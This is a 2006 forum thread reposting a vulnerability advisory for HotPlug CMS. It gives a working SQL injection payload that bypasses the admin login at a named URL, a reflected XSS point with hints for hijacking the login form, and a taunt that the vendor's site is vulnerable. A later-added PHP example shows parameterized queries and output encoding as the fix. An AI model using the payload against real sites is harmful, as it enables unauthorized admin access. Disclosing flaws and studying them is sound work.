Guest Posted June 25, 2006

What's up, Kw3rLN, did you think you were the only one who loves CMSes?

---------------------------------------------------------------------------
Package: HotPlug CMS
version : latest version
---------------------------------------------------------------------------
Package Author: Sebastien Rousseau <seb@phoenixfx.com>
Home Page http://www.hotplugcms.com/
---------------------------------------------------------------------------
Discovered By Sysghost [ Romanian Security Team ]

1. ADMIN Bypass SQL injection

code: query="select * from $this->tablename where email='$u' and password='$w'";
exploit: user=1' or 1 LIMIT 0, 1/*   password=pass
url : http://[site]/administration/tblcontent/login1.php

Only tested on my localhost using MySQL
---------------------------------------------------------------------------
2. XSS

url: http://[site]/administration/tblcontent/login1.php?msg=[XSS CODE]

Hints to XSS attack:
a. a script inject uses the void command to modify the action field in the form.
b. use css to create a new form on top of that one using the position attributes.

Solution :
~~~~~~~~~~
SANITIZE INPUT
---------------------------------------------------------------------------
Shoutz:
~~~~~~
# Greetz to Kw3rLN, str0ke and the members of Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------
*/

I can be found here hTTp://Romania.HackTECK.BE

P.S. hotplug.com is very vulnerable, but I'm too lazy since they use Postgres....
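The advisory's fix is stated only as "sanitize input". The following is an added example, not part of the original post and not HotPlug CMS code, showing one way to close both issues: parameter binding for the login query and output encoding for the reflected msg value. The table and column names, the function names and the sample account are assumptions, and it uses PDO with an in-memory SQLite database so it runs offline.

```php
<?php
// Added example, not HotPlug CMS code. Table and column names, the function
// names and the sample account are constructed for illustration.

// Hardened login lookup: user input is bound as a parameter, never
// concatenated into the SQL text, so quotes in $email stay data.
function find_admin(PDO $db, string $email, string $password): ?array
{
    $stmt = $db->prepare('SELECT id, email, password_hash FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Compare against a stored hash instead of matching the password in SQL.
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return $row;
}

// Output encoding for the reflected "msg" parameter: HTML metacharacters
// become entities before the value is written into the login page.
function render_msg(string $msg): string
{
    return '<p class="msg">' . htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Constructed test data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (email, password_hash) VALUES (?, ?)');
$ins->execute(['admin@example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The legitimate login succeeds.
var_dump(find_admin($db, 'admin@example.test', 'correct horse') !== null);

// The input quoted in the advisory is looked up as a literal e-mail address,
// matches no row, and the login is refused.
var_dump(find_admin($db, "1' or 1 LIMIT 0, 1/*", 'pass'));

// Markup in msg comes back as inert text.
echo render_msg('<b>hello</b>'), PHP_EOL;
```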
Guest Posted June 25, 2006

Ah, damn, of all people I only looked on milw0rm beforehand ... and there were no exploits... only afterwards did it occur to me to look on Google; someone else had already found the XSS ..... :@ :@ :@ I'm going to shoot myself ....